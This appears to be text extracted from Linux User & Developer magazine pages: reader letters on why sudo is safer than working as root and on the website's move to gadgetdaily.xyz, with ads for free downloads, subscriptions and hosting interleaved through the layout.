account that has all the power, why would you not use that? In Windows if you are anything less than an administrator you basically have barely any control over the system at all, so why would you ever Twitter: @linuxusermag Linux User & Developer Above is the new home of our website and those of some of our sister magazines – explore its wealth of content today choose to be in anything less than full control in Linux? Sam Grange When you’re coming from a Windows background it does seem counter-intuitive to deliberately avoid the user account that offers you the maximum amount of control, but there’s a very good reason that lots of Linux professionals do so: security. The root account is literally allowed control over everything in a Linux system, which sounds like a good idea but in practice means that other users of the computer (for example, co-workers on a corporate machine or your kids at home) have the opportunity to launch commands that you’re not aware of. Running a command with sudo (or multiple commands with su) means that you can take advantage of all the power of root when you need to, but that you’re not leaving the shell open, blindly set to root privileges – you need to reiterate that you have super user access with sudo or su each time. This minimises the risk of unwanted, irregular or just plain wrong commands being run as root and causing errors on your system. Security isn’t just about protecting yourself, your machine and your data from hackers – it’s also about protecting it against accidental misuse. Go go Gadget website Hi there, For some time now I’ve found that every time I try to visit the Linux User & Developer website either via my bookmark or by typing in the address, I am sent somewhere else – to a site called gadgetdaily.xyz. I note that it seems to have content on it from Linux User & Developer along with many other interesting things, however I’m curious as to why I’m being taken there instead of to the Linux User & Developer site that I’m used to using. Please advise. Harry Rayson The old incarnation of the Linux User & Developer website is no more – instead, several of our technology magazines now aggregate their website content through the website of our sister magazine Gadget. You’ll find a wealth of content from ourselves and our sister magazines Gadget, iCreate and Web Designer – it’s an Aladdin’s cave of tips, tutorials, hardware guides and so much more. The reason why the old website link automatically redirects you there is because it’s much more convenient for you if we just take you to the new home of the content you’re looking for, rather than manually redirecting you on the page or with new links inside the magazine. And aggregating all of the sites together gives you the opportunity to explore more content that you might find interesting, like the latest tech or a few clever tricks for working with Apple architecture or web design. Have a rummage around the site and you’ll find plenty of interesting stories, guides and more! 95 Free with your magazine Instant access to these incredible free gifts… The best distros and FOSS Essential software for your Linux PC Professional video tutorials The Linux Foundation shares its skills Tutorial project files All the assets you’ll need to follow our tutorials Plus, all of this is yours too… • Download Kali Linux, IPFire and Metasploitable and use them to test your security and access the FOSS in our feature • Enjoy 20 hours of expert video tutorials from The Linux Foundation • Get the program code for our Linux and Raspberry Pi tutorials Log in to Register to get instant access to this pack of must-have Linux distros and software, 40 issues Access our entire library of resources with a money saving subscription to the magazine – that’s hundreds of 20 hours of video guides Essential advice from the Linux Foundation The best Linux distros Specialist Linux operating systems Free Open Source Software Must-have programs for your Linux PC Head to page 32 to subscribe now Already a print subscriber? Here’s how to unlock FileSilo today… Unlock the entire LU&D FileSilo library with your unique Web ID – the eight-digit alphanumeric code that is printed above your address details on the mailing label of your subscription copies. It can also be found on any renewal letters. More than 400 reasons to subscribe More added every issue BUILD A BETTER WEB Available from all good newsagents and supermarkets SOURCE RE EVERY IS DS E • FREE SU WNLOA DO ON SALE NOW Industry interviews | Expert tutorials & opinion | Contemporary features | Behind the build DESIGN INSPIRATION PRACTICAL TIPS BEHIND THE SCENES STEP-BY-STEP ADVICE INDUSTRY OPINION BUY YOUR ISSUE TODAY Print edition available at Digital edition available at Available on the following platforms facebook.com/webdesignermag twitter.com/webdesignermag Linux Server Hosting from UK Specialists 24/7 UK Support • ISO 27001 Certified • Free Migrations Managed Hosting • Cloud Hosting • Dedicated Servers Supreme Hosting. Supreme Support.
https://issuu.com/1magazine1/docs/16dfvdfv
CC-MAIN-2017-34
refinedweb
47,609
60.04
I'm working on a learn.co lab Blackjack cli the line is however of the 15 examples required to pass i keep getting an error for 6 i'am mainly having trouble with the initial_round method and the hit? method. i keep getting an error in the initial round method asking me to call on the display_card_total method to print the sum of cards and the hit? confuses me a little as to what exact its asking def deal_card rand(11) + 1 end def display_card_total(card) puts "Your cards add up to #{card}" end def prompt_user puts "Type 'h' to hit or 's' to stay" end def get_user_input gets.chomp end def end_game(card_total) puts "Sorry, you hit #{card_total}. Thanks for playing!" end def initial_round deal_card deal_card return deal_card + deal_card puts display_card_total end def hit? prompt_user end def invalid_command puts "Please enter a valid command" end You haven't followed the assignment. It specifies that the hit? method should take an argument of the current card total, so it should be... def hit?(current_card_total) It then specified that you should do prompt_user and get_user_input and then test the result for "h" or "s" or other and take appropriate action. If you do a "h" for hit, the current_card_total will be increased, otherwise if you do an "s" it's unchanged, but you need to return the value, regardless of whether it's changed or not. If the user enters something else beside "h" or "s" you call the invalid_command method and prompt again for the correct value ( prompt_user) and you can try to get a response again with get_user_input So, something like this... def hit?(current_card_value) prompt_user user_input = get_user_input while user_input != "h" && user_input != "s" invalid_command prompt_user user_input = get_user_input end if user_input == "h" current_card_value += deal_card end return current_card_value end There's a few things wrong with your initial_deal but just to start with, you need to keep track of the deal_card results in a variable current_card_total = deal_card current_card_total += deal_card That way current_card_total has the accumulated total. Just doing deal_card deal_Card doesn't store the results of deal_card anywhere.
https://codedump.io/share/GsWBajLmH4bE/1/error-messages-in-my-blackjack-cli-in-ruby
CC-MAIN-2016-50
refinedweb
348
58.72
Bible: What Does 1 Corinthians 16 Teach Us About Giving and Friendship? The Site Where the Church Meets Young Timothy Collection for the Poorview quiz statistics Corinth, Greece John MacArthur: Pastor-Teacher Paul's Final Words The apostle’s final words to the Corinthians consist of the following items: (1) A command about a certain collection [vv. 1-4]; (2) A note about his itinerary (vv. 5-9); (3) His instructions regarding their treatment of Timothy and Apollos (vv. 10-12); (4) General exhortations about their conduct; (5) A specific exhortation concerning the household of Stephanas (vv. 13-18); and (6) His last greetings to brethren (vv. 19-24) As he has told Galatian churches, Paul now instructs his readers in Corinth to put aside some money on Sunday (“the first day of the week”) for the poor saints in Jerusalem (vv. 1-2). Accompanying their delegation, he intends to deliver their gift to the great city in order to meet this dire need (vv. 3-4). [The contemporary Church has taken this principle of contributing to the needs of the saints in other churches, and has replaced it with paying down mortgages and funding programs in their own local assembly.] Paul plans to visit Corinth on his way through Macedonia, and, if God so wills, spend the winter with them in hope that they would supply his needs for further travel when the weather broke (vv. 5-7). Since he is currently experiencing great opportunity for service (with its accompanying opposition) in Ephesus, Paul tells them that he has decided to stay there until Pentecost (May-June) [vv. 8-9]. As for their treatment of Timothy, the apostle instructs them to treat him, a fellow servant of the Lord, with respect if he visits them, and then send him peacefully on his way back to minister to Paul (vv. 10-11). [Either Timothy was a very timid fellow, or the Corinthians were an especially rabblerousing group, or both. Why would they despise him? In II Timothy, Paul encourages Timothy not to allow people to despise him because of his youth.] Apollos, Paul says, has decided not to visit them at that time, despite the apostle’s strong entreaty for him to do so; however, he adds that the great orator will come to them at a more convenient time (v. 12). Employing four short imperatives, Paul exhorts the Corinthians not to give up the fight of the Christian life, but to be vigilant, strong, and courageous (v. 13; cf. Josh. 1:6-7, 9). He also instructs them to act with love (v. 14). Probably in connection with this last command to show love, the apostle instructs his readers to submit to the ministry of the household of Stephanas for their diligent service (vv. 15-16). Three men—Stephanas, Fortunatus, and Achaicus—especially aided him when the Corinthians could not, and therefore the Corinthians should appreciate them (vv. 17-18). Last, Paul pens a short list of regional churches, some well-known individuals, and a house church that wished to greet them (v. 19). He then issues a general message of greeting from “all the brethren,” and instructs them to show brotherly affection for one another (v. 20). The apostle tells them that he has written them with his own hand; that is, he did not use an amanuensis (v. 21). Paul tacks on a series of statements to close out this epistle: (1) He desires that God would curse those who do not love Christ (v. 22a); (2) he calls upon Christ to return (v. 22b); (3) he asks God’s grace to empower them (v. 23); and (4) he sends his love in Christ to all of them (v. 24). Study Questions for 1 Corinthians - In what three ways does Paul address the Corinthians? - Name the several specific issues on which the Corinthians needed further exhortation and instruction. - What four separate parties or sects exist in this local church? - How did Paul seek to restore unity among the Corinthians? - What is humanity's proper subject for "glorying"? - What four benefits accrue to those in “the environment” of Christ? - What is God’s “foolishness”? - Discuss the difference between human and divine wisdom. - What are the three kinds of spiritual groups/conditions in this world? - What are the characteristics of these various groups/conditions? - What is one of the roles of the Holy Spirit in the lives of believers? - Discuss the division of spiritual labor among Christian servants. - What will Christ do after the Church’s translation? - What will individual believer’s gain or lose as a result of this activity? - In what two ways should the Corinthian believers consider apostles and teachers? - What hardships were that the apostles forced to endure as Christian leaders? - What does Paul command the Corinthians to do with the one who was guilty of sexual immorality? - What must the church do in order to celebrate the Feast of Unleavened Bread? - What misconception did the Corinthian church hold regarding Paul’s instructions in an earlier lost epistle? - What did the apostle actually command them to do? - What will be one of the tasks of “the saints” in the millennium? - What are the different kinds of sinful lifestyles that certain unbelieving judges lead? - What principle does Paul establish regarding the Christian’s liberty? - Who and what are the temple of the Holy Spirit? - What is the apostle’s teaching regarding celibacy and self-control? - What did Paul teach about divorce and remarriage? - What is the bottom-line principle that Paul reiterates three times in chapter seven? - Discuss whether apostolic advice possesses the same authority as divine revelation. - What general principles does Paul seemingly tack on the end of his discussion on marriage? - In terms of liberty, how should a “strong” Christian regard his “weak” brethren? - What four rhetorical questions does Paul employ in the defense of his apostleship? - What kinds of analogies does the apostle use to prove his point? - What OT principle does he cite to promote social justice toward Christian workers? - How does the analogy of the Isthmian games demonstrate the Christian attitude toward life? - What disqualified OT Israel from further service to God? - What three OT events demonstrate God’s chastisement of His people because of their sin? - Regarding the issue of idolatry, what does the apostle emphasize that the Corinthian Church cannot do? - What general principle does Paul reiterate about Christian liberty? - What is the three-tiered hierarchy that Paul mentions? - What does it mean for a woman to “dishonor her head”? - Should the modern American church, therefore, follow this principle, and teach that women should wear veils? Why or why not? - What did Paul see as wrong with the Corinthians’ agape feast? - When did Jesus ratify the New Covenant? When and with whom will God fulfill it? - What does it mean to participate in the Eucharist “in an unworthy manner”? - What is the only way that believers may avoid discipline for this infraction? - How is each Person of the Trinity involved in the administration of spiritual gifts? - List and discuss the eight spiritual abilities according to honor. - What is “a more excellent way” to live rather than merely exercising gifts? - What gifts does Paul focus on as being inferior to the “more excellent way”? - What are the characteristics of this “more excellent way”? - What does Paul mean when he references “that which is perfect”? - What three virtues remain until now, and which one will endure forever? - Why is prophecy a superior gift to speaking in other languages? - Who must accompany one who speaks in tongues? - What motive(s) should people have for possessing spiritual gifts? - According to Isaiah, what was God’s original purpose for “tongues”? - What does Paul emphasize as paramount in the exercise of gifts in the Church? - What was the apostle’s position regarding women in the church? - What does Paul consider the most vital issue facing the church? - Is perseverance in the faith a prerequisite to salvation—a works mentality—or is it the necessary consequence of possessing the grace of saving faith? - What are the three elements of the gospel Paul received as divine revelation? - Upon what six resurrection appearances does the apostle make remarks? - What are the six devastating ramifications of the “no resurrection” doctrine? - What is the order of resurrections? - Explain how the hierarchical order in the eternal state. - What is the nature of the resurrection body? - Explain the mystery of the Rapture. - What was the original purpose for putting some money aside on Sundays? - About which associates and helpers did Paul address the Corinthians? - With what four statements does Paul close out his epistle? © 2013 glynch1 Popular God used Paul, Saul as a preacher to spread the Word and as a teacher to bring more communities to the Lord. This hub is very good teaching material for studying New Testament Books that Paul collaborated with writing. I will read more as I have the urge to. Thank you for sharing. Very much enjoyed this hub.
https://hubpages.com/religion-philosophy/1-Corinthians-16
CC-MAIN-2018-34
refinedweb
1,503
65.62
Important: Please read the Qt Code of Conduct - Adding a QWindow to UIKit application on iOS Hi all, This is essentially a continuation of this topic: I have a requirement to embed Qt content to an iOS application written in Swift. For testing purposes I am using Objective-C at first. For the example below I am using RasterWindow class from here: I have created a single-view iOS application using XCode. Then converted it Obj-C++ by changing extensions form ".m" to ".mm". Added Qt library and header paths to the project. Added RasterWindow class. And now I am trying to instantiate and display it like this: #include <QApplication> #include "rasterwindow.h" @interface ViewController () @end @implementation ViewController RasterWindow* _rwnd; - (void)viewDidLoad { [super viewDidLoad]; static int argc = 0; static char* argv = nullptr; QGuiApplication* qtAppInstance = new QGuiApplication(argc, &argv); _rwnd = new RasterWindow(); _rwnd->show(); self.view = (__bridge UIView*)reinterpret_cast<void*>(_rwnd->winId()); // self.view.contentMode = UIViewContentModeScaleToFill; // UIView* qtView = (__bridge UIView*)reinterpret_cast<void*>(_rwnd->winId()); // [self.view addSubview:qtView]; NSLog(@"view did load %@", self.view); // Do any additional setup after loading the view, typically from a nib. } Execution produces following log: virtual void RasterWindow::showEvent(QShowEvent *) QRect(0,0 0x0) 2018-09-21 06:43:08.165951+0200 QtInObjCiOS[47805:764033] view did load <QUIView: 0x7ffe72409b90; frame = (0 0; 0 0); layer = <CAEAGLLayer: 0x6000027ffb80>> -[ViewController viewDidAppear:] QRasterWindow(0x6000003b6a60) QRect(0,0 834x1112) Visible result is a black screen, the window is not being drawn. If I change from assigning Qt window to self.view to adding it as a subview, then behaviour changes so that RasterWindow instance will have (0,0) size, and I couldn't force it to take size. Note, same code works for Mac Cocoa using NSView. As does this simple app #include "rasterwindow.h" #include <QApplication> int main(int argc, char *argv[]) { QApplication a(argc, argv); RasterWindow w; w.show(); return a.exec(); } What am I missing? How do I correctly add a QWindow to a UIViewController? Thank you in advance! p.s. Complete project: Mind, you'd have to change library and header paths to match your project and Qt locations. Ok, the problem solved itself with update to Qt 5.11.2 (while running iOS12). Thanks for reading. Ok, the problem solved itself with update to Qt 5.11.2 (while running iOS12). Thanks for reading.
https://forum.qt.io/topic/94835/adding-a-qwindow-to-uikit-application-on-ios
CC-MAIN-2020-34
refinedweb
390
51.55